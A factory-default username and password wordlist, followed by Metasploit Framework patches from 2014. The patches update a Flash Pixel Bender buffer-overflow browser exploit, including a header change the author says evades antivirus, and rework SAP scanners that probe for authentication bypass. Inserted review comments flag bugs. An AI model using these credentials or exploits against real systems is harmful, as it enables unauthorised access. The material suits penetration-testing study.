X#1833 - wodj - FOOBAR -SYSMAN SYSMAN -VMMAP -admin urchin -PORTAL30_DEMO PORTAL30_DEMO -Ezsetup -QS_CS QS_CS -administrator PlsChgMe! 
-CMSUSER - MCUrv -DEMO1 -admin adminadmin -userNotUsed userNotU - AMI~ -root ibm -ncadmin ncadmin -TESTPILOT TESTPILOT - Polrty -fg_sysadmin password -UETP UETP -QS QS -DBI MUMBLEFRATZ -  ILMI -SYSTEM SYS -JWARD AIROPLANE -APPS_MRC APPS_MRC - uboot -Moe hello -SENTINEL SENTINEL -admin netgear1 -Yak asd123 -PDP11 PDP11 - aammii -Flo hello -SLIDE SLIDEPW -root bagabu -primeos primeos - Spacve - 256256 -INFO INFO -checkfsys checkfsys -PRODCICS PRODCICS - foolproof - AWARD_PW -MXAGENT MXAGENT -SYSTEM ORACLE8I -admin no password -VMTLIBR -POWERCARTUSER POWERCARTUSER -VMBACKUP -CPNUC - QDI - shiva -distrib distrib0 -SUPERVISOR SUPERVISOR -SYSMAINT SERVICE -MIGRATE MIGRATE -CDEMOUCB CDEMOUCB -system prime -QSRV 22222222 - c -OLTSEP -sysbin sysbin -signa signa -autocad autocad - SWITCHES_SW -WEBDB WEBDB -daemon - aPAf -ncrm ncrm -SAMPLE SAMPLE - 1 -HCPARK HCPARK -ALLINONE ALLINONE -nm2user nm2user -SAVSYS -IIPS -PATROL PATROL - technolgi - MBIU0 -mailadmin secret -adm adm -TMSADM -tutor tutor -ESubscriber -CHEY_ARCHSVR CHEY_ARCHSVR -write synnet -software software -admin welcome -god2 12345 -bbs bbs - Dell -disttech disttech -FSFTASK2 - zbaaaca - prost -ORDSYS ORDSYS -Administrator administrator - 1234567890 -gopher gopher -PSFMAINT -SYSTEM MANAG3R - RM - s!a@m#n$p%c -EAdmin -12345 12345 -DECNET DECNET -OPERATIONS OPERATIONS -$system -REP_OWNER DEMO -PANAMA PANAMA -LIBRARIAN SHELVES -SYSTEM 0RACLE -fal -4Dgifts 4Dgifts - biosstar -NETSERVER NETSERVER - tiny -root TANDBERG -POWERCHUTE APC -USER5 USER5 -GPFD GPFD - 12345678 -blank admin -QS_OS QS_OS -sysadm admin -REPADMIN REPADMIN -Administrator 12345678 -0 0 -DEMO8 DEMO8 -DEMO9 DEMO9 -CDEMO82 CDEMO82 -admin boca raton -Administrator vision2 -administrator 0 -umountsys umountsys -snmp snmp -Username PASSWORD -volition -USER0 USER0 -CDEMOCOR CDEMOCOR -SYSTEST UETP -Rodopi Rodopi -DECNET NONPRIV -user_checker demo - tatercounter2000 -qserv qserv - ESSEX or IPC -AQ AQ -support -SAPR3 SAP -VRR1 VRR1 -fastwire fw -admi admin 
-FINANCE FINANCE -WinCCAdmin 2WSXcder -ESTOREUSER ESTORE -fax fax -VIRUSER VIRUSER -LINK LINK -APPLSYSPUB FNDPUB - BIOS -SYS ORACLE8 -SYS ORACLE9 -overseer overseer -checksys checksys -umountfs umountfs -DBDCCICS DBDCCIC -Admin password - x6zynd56 -TOAD TOAD -root mozart -ntpupdate ntpupdate -root router -MDDEMO_MGR MGR -ARCHIVIST -SUPERVISOR HARRIS - 11111 -billy-bob -lp bin -DECMAIL DECMAIL -alien alien -admin dnnadmin -nsroot nsroot -AdvWebadmin advcomm500349 -dvstation dvst10n -SERVICECONSUMER1 SERVICECONSUMER1 -MMO2 MMO2 -qsecofr 11111111 -NOC NOC -WWWUSER WWWUSER -root Serial port only -SAP SAPR3 -root t0talc0ntr0l4! -NEVIEW -MAIL -ODSCOMMON ODSCOMMON -fal fal -pixadmin pixadmin -ripeop -PENG - BIOSPASS -netlink netlink -L2LDEMO L2LDEMO -OUTLN OUTLN -12.x -scott tiger or tigger - toshy99 -dbase dbase - nz0u4bbe -fam fam - bell9 -Oper Oper -RMAIL RMAIL -administrator 19750407 -FND FND -admin exinda -PRIV PRIV -admin barney -SETUP - biodata - 24Banc81 -news news -VSEIPO - j09F -pw pw -GUEST -ilon ilon - award_? -SYS 0RACLE39 -SYS 0RACLE38 -DEFAULT DEFAULT - AMI!SW -PLSQL SUPERSECRET -root alpine -politcally correct -18140815 18140815 -APPUSER APPUSER -SUPERVISOR -CENTRA CENTRA -LBACSYS LBACSYS - alfarome -PDP8 PDP8 -SFCMI -administrator * * # -lpadm lpadm -Test Everything -bewan bewan - 2580 -DIP DIP - Sxyz -mfd mfd -MDDEMO MDDEMO - intermec - 589589 -SWPRO SWPRO -DES DES -root fibranne -Coco hello -GCS -rodopi rodopi - touchpwd= -Scott Tiger -Admin5 4tugboat -admin funkwerk -ANDY SWORDFISH -DESQUETOP -nobody -Manager 657 - mysweex -SYSTEM SYSLIB -NETCON NETCON -JONES STEEL -author author -MOESERV -web web -tech User -PUBSUB1 PUBSUB1 -SYS D_SYSPW -CATALOG CATALOG - IBM - Guest -SQLUSER -RE RE -REPORTS_USER OEM_TEMP -MFG MFG -POST POST -HPLASER HPLASER -HR HR -VIDEOUSER VIDEO USER -DBA SQL - CMOSPWD -guest1 guest -superuser asante -SYSTEM 0RACLE38 -SYSTEM 0RACLE39 -AUTOLOG1 -dadmin dadmin -AURORA$JIS$UTILITY$ -wlcsystem wlcsystem -news -CPRM 
From 97b63d708c992d74833cd6fcc1a00ad4824aabe0 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 18:18:23 +0200 Subject: [PATCH 336/853] Corrected naming to be in line with msf convention --- ...r_services_unhash.txt => default_pass_for_services_unhash.txt} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename data/wordlists/{default_passwords_for_services_unhash.txt => default_pass_for_services_unhash.txt} (100%) diff --git a/data/wordlists/default_passwords_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt similarity index 100% rename from data/wordlists/default_passwords_for_services_unhash.txt rename to data/wordlists/default_pass_for_services_unhash.txt From c9bb2d516565331f93e8a4c1af85848dc474b20b Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 20:55:50 +0200 Subject: [PATCH 337/853] Added headers to files --- data/wordlists/default_pass_for_services_unhash.txt | 3 +++ data/wordlists/default_userpass_for_services_unhash.txt | 3 +++ data/wordlists/default_users_for_services_unhash.txt | 3 +++ 3 files changed, 9 insertions(+) diff --git a/data/wordlists/default_pass_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt index 7203bcda29..6ad340cf2a 100644 --- a/data/wordlists/default_pass_for_services_unhash.txt +++ b/data/wordlists/default_pass_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default passwords from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin password diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index ff0458f94b..c83ece0a21 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt 
@@ -1,3 +1,6 @@ +# Default user/passwords from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin admin admin diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt index c36f0e7e2b..3ba04c3750 100644 --- a/data/wordlists/default_users_for_services_unhash.txt +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -1,3 +1,6 @@ +# Default users from the unhash project. Useful for finding out +# factory default passwords in embedded devices or services. +# http://github.com/tkisason/unhash admin root From 9b29c572a7c1a6ade4184261c56919fca1debd9f Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 21:14:17 +0200 Subject: [PATCH 338/853] Comments dont work with auth_brute.rb --- data/wordlists/default_pass_for_services_unhash.txt | 3 --- data/wordlists/default_userpass_for_services_unhash.txt | 3 --- data/wordlists/default_users_for_services_unhash.txt | 3 --- 3 files changed, 9 deletions(-) diff --git a/data/wordlists/default_pass_for_services_unhash.txt b/data/wordlists/default_pass_for_services_unhash.txt index 6ad340cf2a..7203bcda29 100644 --- a/data/wordlists/default_pass_for_services_unhash.txt +++ b/data/wordlists/default_pass_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default passwords from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin password diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt index c83ece0a21..ff0458f94b 100644 --- a/data/wordlists/default_userpass_for_services_unhash.txt +++ b/data/wordlists/default_userpass_for_services_unhash.txt 
@@ -1,6 +1,3 @@ -# Default user/passwords from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin admin admin diff --git a/data/wordlists/default_users_for_services_unhash.txt b/data/wordlists/default_users_for_services_unhash.txt index 3ba04c3750..c36f0e7e2b 100644 --- a/data/wordlists/default_users_for_services_unhash.txt +++ b/data/wordlists/default_users_for_services_unhash.txt @@ -1,6 +1,3 @@ -# Default users from the unhash project. Useful for finding out -# factory default passwords in embedded devices or services. -# http://github.com/tkisason/unhash admin root From 033757812d3879f646a3206f1552742b532551b2 Mon Sep 17 00:00:00 2001 From: Jonas Vestberg <bugch3ck@users.noreply.github.com> Date: Sun, 18 May 2014 22:43:51 +0200 Subject: [PATCH 339/853] Updates to adobe_flash_pixel_bender_bof: 1. Added embed-element to work with IE11 (and Firefox). Removed browser-requirements for ActiveX (clsid and method). 2. Added Cache-Control header on SWF-download to avoid AV-detection (no disk caching = no antivirus-analysis :). Testing performed: Successfully tested with Adobe Flash Player 13.0.0.182 with IE9, IE10 and IE11 running on Windows 7SP1. (Exploit will trigger on FF29, although sandboxed.) --- .../windows/browser/adobe_flash_pixel_bender_bof.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 43997895ef..9c28caa2f8 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb 
@@ -17,8 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module - has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over - Windows XP SP3, Windows 7 SP1 and Windows 8. + has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 + over Windows XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => @@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", - :method => "LoadMovie", + #:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + #:method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => Msf::HttpClients::IE, + #:ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote if request.uri =~ /\.swf$/ print_status("Sending SWF...") - send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end @@ -111,6 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=flash_payload%>" /> <param name="Play" value="true" /> + <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/> </object> </body> </html> From 975cdcb53758a1aeb6329a0a5c08b9174a2c8a68 Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 18 May 2014 23:24:01 -0500 Subject: [PATCH 340/853] Allow exploitation also on FF --- .../windows/browser/adobe_flash_pixel_bender_bof.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 9c28caa2f8..0d03d85173 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'InitialAutoRunScript' => 'migrate -f', + # Disabled by default to allow sessions on Firefox, still useful when exploiting IE + #'InitialAutoRunScript' => 'migrate -f', 'Retries' => false, 'EXITFUNC' => "thread" }, @@ -50,10 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, - #:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", - #:method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, - #:ua_name => Msf::HttpClients::IE, + :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From 2fb0dbb7f8fbc14552a0dd91d007ae01cf06713f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 18 May 2014 23:34:04 -0500 Subject: [PATCH 341/853] Delete debug print_status --- .../exploits/windows/browser/adobe_flash_pixel_bender_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 0d03d85173..c29080ed3c 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb 
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => lambda { |ua| print_status(ua); ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, + :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From e59f104195f37146cadf3151b32591bfd9153f9b Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:41:01 +0100 Subject: [PATCH 342/853] Use unless --- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 144 ++++++++++-------- 1 file changed, 80 insertions(+), 64 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 870936569c..87246442be 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary 
@@ -30,143 +29,160 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]), - OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"]) + OptPath.new('URLFILE', [true, "SAP ICM Paths File", + File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')]) ], self.class) end # Base Structure of module borrowed from jboss_vulnscan def run_host(ip) - # If URLFILE is set empty, obviously the user made a silly mistake - if datastore['URLFILE'].empty? - print_error("Please specify a URLFILE") - return - end - - # Initialize the actual URLFILE path - if datastore['URLFILE'] == "sap_icm_paths.txt" - url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}" - else - # Not the default sap_icm_paths file - url_file = datastore['URLFILE'] - end - - # If URLFILE path doesn't exist, no point to continue the rest of the script - if not File.exists?(url_file) - print_error("Required URL list #{url_file} was not found") - return - end - - res = send_request_cgi( + res = send_request_cgi( { 'uri' => "/" + Rex::Text.rand_text_alpha(12), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if res print_status("Note: Please note these URLs may or may not be of interest based on server configuration") @info = [] - if not res.headers['Server'].nil? 
+ if res.headers['Server'] @info << res.headers['Server'] print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}") else print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header") end - if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) ) + if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) ) print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}") end # Load URLs - urls_to_check = [] - File.open(url_file) do |f| + urls_to_check = check_urlprefixes + File.open(datastore['URLFILE']) do |f| f.each_line do |line| urls_to_check.push line end end print_status("#{rhost}:#{rport} Beginning URL check") + @valid_urls = '' urls_to_check.each do |url| check_url(url.strip) end - # check custom URLs - check_urlprefixes else print_error("#{rhost}:#{rport} No response received") end + if @valid_urls.length > 0 + l = store_loot( + 'sap.icm.urls', + "text/plain", + datastore['RHOST'], + @valid_urls, + "icm_urls.txt", "SAP ICM Urls" + ) + print_line + print_good("Stored urls as loot: #{l}") if l + end end def check_url(url) + full_url = write_url(url) res = send_request_cgi({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) + }) if (res) - if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil? 
- print_good("New server header seen [#{res.headers['Server']}]") - @info << res.headers['Server'] #Add To seen server headers + if res.headers['Server'] + unless @info.include?(res.headers['Server']) + print_good("New server header seen [#{res.headers['Server']}]") + @info << res.headers['Server'] #Add To seen server headers + end end - case - when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})") - when res.code == 403 - print_good("#{rhost}:#{rport} #{url} - restricted (403)") - when res.code == 401 - print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}") + case res.code + when 200 + print_good("#{full_url} - does not require authentication (#{res.code})") + @valid_urls << full_url << "\n" + when 403 + print_status("#{full_url} - restricted (#{res.code})") + when 401 + print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}") # Attempt verb tampering bypass bypass_auth(url) - when res.code == 404 + when 404 # Do not return by default, only display in verbose mode - vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)") - when res.code == 500 - print_good("#{rhost}:#{rport} #{url} - produced a server error (500)") - when res.code == 301, res.code == 302 - print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)") + vprint_status("#{full_url} - not found (#{res.code})") + when 400,500 + print_status("#{full_url} - produced a server error (#{res.code})") + when 301, 302 + print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") + @valid_urls << full_url << "\n" + when 307 + vprint_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") else - vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}") + print_error("#{full_url} - unhandled 
response code #{res.code}") + @valid_urls << full_url << "\n" end else - print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)") + vprint_status("#{full_url} - not found (No Repsonse code Received)") end end + def write_url(path) + if datastore['SSL'] + protocol = 'https://' + else + protocol = 'http://' + end + + "#{protocol}#{rhost}:#{rport}#{path}" + end + def bypass_auth(url) - print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})") + full_url = write_url(url) + vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})") res = send_request_raw({ - 'uri' => url, + 'uri' => normalize_uri(url), 'method' => datastore['VERB'], 'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason - }, 20) + }) - if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})") + if (res && res.code == 200) + print_good("#{full_url} Got authentication bypass via HTTP verb tampering") + @valid_urls << full_url << "\n" else - print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") + vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end end + # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. + # This is how the message server finds out which URLs must be forwarded where. + # (SAP help) -> this disclose custom URLs that are also checked for authentication def check_urlprefixes - # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." 
(SAP help) - # -> this disclose custom URLs that are also checked for authentication + urls = [] res = send_request_cgi({ 'uri' => "/sap/public/icf_info/urlprefix", 'method' => 'GET', - 'ctype' => 'text/plain', - }, 20) - if (res and res.code == 200) + }) + + if (res && res.code == 200) res.body.each_line do |line| if line =~ /PREFIX=/ url_enc = line.sub(/^PREFIX=/, '') + # Remove CASE and VHOST + url_enc = url_enc.sub(/&CASE=.*/, '') url_dec = URI.unescape(url_enc).sub(/;/, '') - check_url(url_dec.strip) + urls << url_dec.strip end end + else + print_error("#{rhost}:#{rport} Could not retrieve urlprefixes") end + + urls end end From 88b7dc3def814bb390a62d2e42a473fedae8a062 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:46:47 +0100 Subject: [PATCH 343/853] re-add content length --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 87246442be..a2be50da68 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary case res.code when 200 - print_good("#{full_url} - does not require authentication (#{res.code})") + print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})") @valid_urls << full_url << "\n" when 403 print_status("#{full_url} - restricted (#{res.code})") From 5d96f54410a0e6630dfb2e1f71f1ac5212073693 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:52:06 +0100 Subject: [PATCH 344/853] Be verbose about 307 --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
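Review bot: In the new `run_host`, `@valid_urls` is assigned only inside the `if res` branch, but the added `if @valid_urls.length > 0` runs after the `else` as well. A host that returns no response therefore appears to call `.length` on nil and raise NoMethodError right after "No response received" is printed, unless the variable happens to survive from an earlier run. Initialising it up front, `@valid_urls = ''` as the first statement of `run_host`, or returning from the `else` branch, keeps the loot step safe. Separately, the new `vprint_status` in `check_url` spells "Repsonse", and `when 400,500` reports a 400 under the "server error" message.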
diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index a2be50da68..cd3116d67c 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -116,11 +116,11 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{full_url} - not found (#{res.code})") when 400,500 print_status("#{full_url} - produced a server error (#{res.code})") - when 301, 302 + when 301, 302, print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") @valid_urls << full_url << "\n" when 307 - vprint_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") + print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") else print_error("#{full_url} - unhandled response code #{res.code}") @valid_urls << full_url << "\n" From 848227e18ab9a32bb7dcf5ac976844631c5cb26b Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 10:59:38 +0100 Subject: [PATCH 345/853] 401 should be a valid url --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index cd3116d67c..7c26bbd1dc 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -109,6 +109,7 @@ class Metasploit3 < Msf::Auxiliary print_status("#{full_url} - restricted (#{res.code})") when 401 print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}") + @valid_urls << full_url << "\n" # Attempt verb tampering bypass bypass_auth(url) when 404 
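Review bot: The changed line `when 301, 302,` in the `@@ -116,11 +116,11 @@` hunk ends with a trailing comma, so Ruby continues the value list onto the next line and treats the `print_good(...)` call as a third `when` candidate rather than as the branch body. As written, 301/302 responses would be added to `@valid_urls` without any message, and every status that reaches this clause without matching would evaluate `print_good` and print a spurious "redirected" line before falling through to the 307 and `else` branches. The line should read `when 301, 302`. The enclosing `case` in `check_url` starts and ends outside the hunk.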
@@ -153,7 +154,6 @@ class Metasploit3 < Msf::Auxiliary if (res && res.code == 200) print_good("#{full_url} Got authentication bypass via HTTP verb tampering") - @valid_urls << full_url << "\n" else vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end From 6b1e4c3a9de966272c75fb13687fdba6191494d7 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 11:17:58 +0100 Subject: [PATCH 346/853] Show loot and error code --- .../sap/sap_mgmt_con_getprocessparameter.rb | 28 ++++++------------- 1 file changed, 9 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index 8fbb4cc489..201e252d19 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -30,7 +30,7 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(50013), - OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']), + OptString.new('TARGETURI', [false, 'Path to the SAP Management Console ', '/']), OptString.new('MATCH', [false, 'Display matches e.g login/', '']), ], self.class) register_autofilter_ports([ 50013 ]) @@ -38,16 +38,6 @@ class Metasploit4 < Msf::Auxiliary end def run_host(ip) - res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']), - 'method' => 'GET' - }, 25) - - if not res - print_error("#{rhost}:#{rport} [SAP] Unable to connect") - return - end - getprocparam(ip) end @@ -75,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary begin res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']), + 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 'data' => data, 'headers' => 
@@ -84,9 +74,9 @@ class Metasploit4 < Msf::Auxiliary 'SOAPAction' => '""', 'Content-Type' => 'text/xml; charset=UTF-8', } - }, 30) + }) - if not res + unless res print_error("#{rhost}:#{rport} [SAP] Unable to connect") return end @@ -100,7 +90,7 @@ class Metasploit4 < Msf::Auxiliary body = res.body success = true end - elsif res.code == 500 + elsif res case res.body when /<faultstring>(.*)<\/faultstring>/i faultcode = $1.strip @@ -116,16 +106,16 @@ class Metasploit4 < Msf::Auxiliary end if success - #Only stoor loot if MATCH is not selected - if datastore['MATCH'].empty? - print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot") - store_loot( + # Only store loot if MATCH is not selected + if datastore['MATCH'].blank? + loot = store_loot( "sap.getprocessparameters", "text/xml", rhost, res.body, ".xml" ) + print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to #{loot}") else name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n']) print_status("[SAP] Regex match selected, skipping loot storage") From 0ef2e07012081b47a560ca0c17c14fadc11889af Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 19 May 2014 08:59:54 -0500 Subject: [PATCH 347/853] Minor desc and status updates, cosmetic --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 2 +- modules/auxiliary/scanner/snmp/brocade_enumhash.rb | 4 ++-- modules/auxiliary/scanner/snmp/netopia_enum.rb | 2 +- modules/auxiliary/scanner/snmp/ubee_ddw3611.rb | 2 +- .../windows/antivirus/symantec_workspace_streaming_exec.rb | 6 +++--- 5 files changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 4812b2a232..f22cfe9fa2 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb 
